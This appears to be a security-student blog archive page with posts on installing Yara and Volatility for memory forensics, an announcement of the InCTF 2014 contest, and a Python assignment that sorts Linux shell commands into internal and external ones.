Volatility supports many plugins which help to identify malware in memory dumps, and many of the malware-related plugins use the Yara library. You can download the most recent version available, but for this demo I am using an older version of Yara.

h1dd3ntru7h@bi0s:~/Apps$ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf yara-1.4.tar.gz

h1dd3ntru7h@bi0s:~/Apps$ cd yara-1.4/
h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo ./configure

h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make

h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make install

Step 5: Installing Yara Python

Please follow the instructions in Step 4 before installing Yara Python. You can download the Yara Python 1.4a source from here. Note that if you downloaded a different version of Yara in Step 4, then download a compatible version of Yara Python.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf yara-python-1.4a.tar.gz

h1dd3ntru7h@bi0s:~/Apps$ cd yara-python-1.4a/

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ python setup.py build

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ python setup.py build install

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ echo "/usr/local/lib" >> /etc/ld.so.conf
h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ ldconfig

We are done installing the dependencies; now we will install the Volatility framework. Please download the source from here; you can download and use it wherever you want. After downloading, extract it to a directory.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python setup.py build

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python setup.py build install

This completes the installation, and if everything went the right way you should get similar output:

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python vol.py -h
Volatility Foundation Volatility Framework 2.3.1
Usage: Volatility - A memory forensics analysis platform.

Options:
  -h, --help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  --conf-file=/home/h1dd3ntru7h/.volatilityrc
[stripped]

InCTF 2014 – National Level Ethical Hacking contest

January 28, 2014


Not a day passes without several machines being compromised and infections spreading rampantly in the world today. The cyber world has witnessed several dangerous attacks including the Stuxnet virus and its successor Duqu. Other recent attacks include the Flame malware, which managed to disguise itself as legitimate Windows software: it exploited a bug in Windows to obtain a certificate which allowed it to authenticate itself as genuine Windows software. Other notable examples include the rise of botnets such as the highly resilient Zeus banking trojan and the Conficker worm. There have also been instances of espionage by government agencies on one another, such as the recent incident where Georgia CERT discovered a Russian hacker spying on them.

Indian websites offer little or no resistance to such security incidents. The Computer Emergency Response Team, India (CERT-In) has been tracking defacements of Indian websites amongst other security incidents; their monthly and annual bulletins detail the various vulnerabilities and malware infections in Indian websites. It is really sad that with so much talent and skill, Indian websites are compromised frequently and nothing is done to stem this wave of attacks on them.

InCTF is a Capture the Flag style ethical hacking contest, a strategic war-game designed to mimic real-world security challenges. Software developers in India have little exposure to secure coding practices and to the effects of not adopting them, one of the main reasons why systems are compromised quite easily these days. Following such simple practices can help prevent such incidents.

InCTF ’14 runs from December 2013 to March 2014 and is focused exclusively on the student community. No prior exposure or experience in cyber security is needed to participate.

What you need to do:
1. Form a team (minimum three and maximum five members from your college)
2. Approach a faculty/mentor and request him/her to mentor your team
3. Register online at http://portal.inctf.in

Great Rewards:
20K – The winning team receives a cash prize of up to Rs. 20000/-
15K – The first runner-up team receives a cash prize of up to Rs. 15000/-
10K – The second runner-up team receives a cash prize of up to Rs. 10000/-

See Prizes for more.
Note

  • Teams are awarded prizes based on their performance
  • Deserving teams are well awarded. Exciting prizes to be won.

So, what are you waiting for? It’s simple: Register, Learn, Hack!

*Cash prizes are subject to their performance and participation in the CTF round. Only teams who connect to the VPN server and successfully gain points in the CTF round are eligible for prizes. In addition, cash prize winners of previous editions of InCTF and sCTF are not eligible for prizes this time. Prizes will be awarded only if all members of the team are not in final year of their education. The decision of Team InCTF is final.

Internal and External Commands

January 12, 2013

Internal Commands:

As part of my OS Security course, we had an assignment about differentiating internal and external commands in Linux. Internal commands are those which are built into the shell, i.e. they are already loaded into the system and are executed directly. They don’t require a separate process to execute them. They are PATH independent and they are not coded in files. PATH is represented as “$PATH”, and it is an environment variable that tells the shell which directories to search for the executables provided by the user. Just type and check $PATH and env in your terminal. Oh… btw env is a 32-bit LSB executable file, which shows a list of the current environment variables and their values for the current user. The “env” file can be found in the /usr/bin directory. We can pick the PATH variable out of env’s output using the grep command and a pipe.


shankie@ubuntu:~/Desktop$ env | grep "$PATH"
PATH=/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

OK, coming back to the topic: in Linux we can differentiate the commands using the type command. If it is an internal command, type will print a message that it is a shell builtin. Otherwise it will mention the directory of the command, i.e. the directory where the executable is located.

shankie@ubuntu:~/Desktop$ type cd
cd is a shell builtin

External commands are not executed directly by the shell. More precisely, they are not loaded into the shell itself; e.g. cat, ifconfig, firefox (if installed). Each of them runs as an individual process. They rely on the $PATH variable to be found. Usually, common Linux commands are found in /bin or in /sbin. If the directory holding a command typed by the user is not listed in the variable, the command won’t be executed.

shankie@ubuntu:~/Desktop$ type ifconfig
ifconfig is hashed (/sbin/ifconfig)
shankie@ubuntu:~/Desktop$ type cat
cat is hashed (/bin/cat)
shankie@ubuntu:~/Desktop$ type firefox
firefox is /usr/bin/firefox

So this is the assignment, implemented in Python (HOPE IT IS COMPLETE NOW!): given a list of terminal commands, it sorts the commands issued by the user into internal and external commands and executes them. You can also download the code below with a sample input from my Repository.


#!/usr/bin/env python3

'''
Variable Descriptions:

List:
commands ( Terminal commands issued by the User )
final ( STDOUT of the "type" check run on each command )

'''

# Imports
import os


# Special Case: Directory execution
def SHELL(catch):
    """Execute one command line. 'cd' is handled specially because it is a
    builtin: the directory change must happen in this process, not in a
    child shell spawned by os.system()."""

    # Generalization of Getting HOME DIR: read it from the environment
    # instead of hard-coding /home/<user>
    path = os.environ.get('HOME', os.path.expanduser('~'))
    words = catch.split()

    # Normal Commands Other Than CD
    if not words or words[0] != 'cd':
        os.system(catch)
        return

    # Moving Forward: a bare "cd" goes to the home directory
    if len(words) == 1:
        os.chdir(path)
        print("Your Directory is Changed! Select a option!")
        print("1. List the files and Subdirectory")
        print("2. Print the Path")
        choice = input()
        if choice == '1':
            os.system('ls')
        elif choice == '2':
            os.system('pwd')
        else:
            print("Wrong Option")

    # Moving Backward: "cd <directory>" changes into the given directory
    else:
        strip = words[1]
        try:
            os.chdir(strip)
        except OSError as err:
            print("Cannot change directory:", err)
            return
        print("Your Directory has Changed! Now you are inside the path!")
        os.system("pwd")


# User Input
commands, final = [], []
no = int(input("Enter the number of commands:"))
for i in range(no):
    commands.append(input("Enter the commands:"))

# STDOUT READER: ask the shell's own "type" builtin about each command
for i in range(no):
    output = os.popen('type ' + commands[i]).readlines()
    final.append(output)

# Classifying Internal or External Command
for i in range(no):
    temp = str(final[i])
    # "type cd" prints "cd is a shell builtin"; external commands print a path
    if 'shell' in temp:
        print(commands[i] + ' is Internal Command')
    else:
        print(commands[i] + ' is External Command')
    SHELL(commands[i])
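A second way to do the same classification, added here as an example and not part of the assignment code above: instead of spawning a shell and parsing the text of `type` for every command, it asks bash once for its list of builtins (`compgen -b`) and resolves everything else against `$PATH` with `shutil.which`. The names `shell_builtins`, `classify` and `classify_all` are mine, the `POSIX_BUILTINS` fallback list is a constructed subset used only when bash is not installed, and the `path` parameter lets you see how the same command becomes unresolvable when its directory is missing from PATH.

```python
import shutil
import subprocess

# Fallback used only when bash is not available: a constructed, deliberately
# short list of POSIX shell builtins.
POSIX_BUILTINS = {'cd', 'echo', 'export', 'exit', 'set', 'unset', 'eval',
                  'exec', 'read', 'shift', 'trap', 'umask', 'wait', 'alias',
                  'test', '[', '.', ':'}


def shell_builtins():
    """Return the set of builtin names of the local bash, obtained once via
    its 'compgen -b' builtin; fall back to POSIX_BUILTINS if bash is absent."""
    try:
        out = subprocess.run(['bash', '-c', 'compgen -b'],
                             capture_output=True, text=True, check=True).stdout
        return set(out.split())
    except (FileNotFoundError, subprocess.CalledProcessError):
        return set(POSIX_BUILTINS)


def classify(command, path=None, builtins=None):
    """Classify a command line the way the shell resolves its first word.

    Returns ('internal', None) for a builtin, ('external', '/abs/path') for an
    executable found on PATH (or on the explicit `path` string, if given), and
    ('unknown', None) when neither applies.
    """
    words = command.split()
    if not words:
        return ('unknown', None)
    name = words[0]
    if builtins is None:
        builtins = shell_builtins()
    # The shell consults its builtins before searching PATH, so 'echo' is
    # internal even though /bin/echo also exists as a file.
    if name in builtins:
        return ('internal', None)
    location = shutil.which(name, path=path)
    if location:
        return ('external', location)
    return ('unknown', None)


def classify_all(commands, path=None):
    """Classify a list of command lines, asking the shell for builtins once."""
    builtins = shell_builtins()
    return {cmd: classify(cmd, path=path, builtins=builtins) for cmd in commands}


if __name__ == '__main__':
    # Constructed sample input in the spirit of the assignment
    sample = ['cd /tmp', 'cat /etc/hostname', 'echo hi', 'firefox', 'nosuchcmd']
    for cmd, (kind, where) in classify_all(sample).items():
        print(f'{cmd!r}: {kind}' + (f' ({where})' if where else ''))
```

Passing `path='/nonexistent'` to `classify` turns `cat` from external into unknown, which is exactly the point made above: an external command only runs if its directory is in PATH, while a builtin such as `cd` is found regardless.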
